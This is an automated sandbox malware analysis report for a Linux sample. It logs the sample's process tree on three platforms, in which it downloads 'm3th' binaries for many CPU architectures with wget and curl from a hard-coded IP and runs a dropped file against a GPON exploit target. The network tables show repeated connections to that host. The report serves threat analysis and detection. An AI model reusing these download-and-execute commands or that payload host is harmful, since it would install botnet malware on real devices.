Analysis Overview
SHA256
36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
Threat Level: Shows suspicious behavior
The file 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 16:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 11:21
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
80s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 84.17.50.9:443 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 10:38
Platform
debian9-armhf-20240729-en
Max time kernel
86s
Max time network
87s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp | |
| HR | 45.95.168.230:80 | tcp |
Files
memory/738-1-0xb6703000-0xb6714044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 10:54
Platform
debian9-mipsbe-20240729-en
Max time kernel
99s
Max time network
101s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
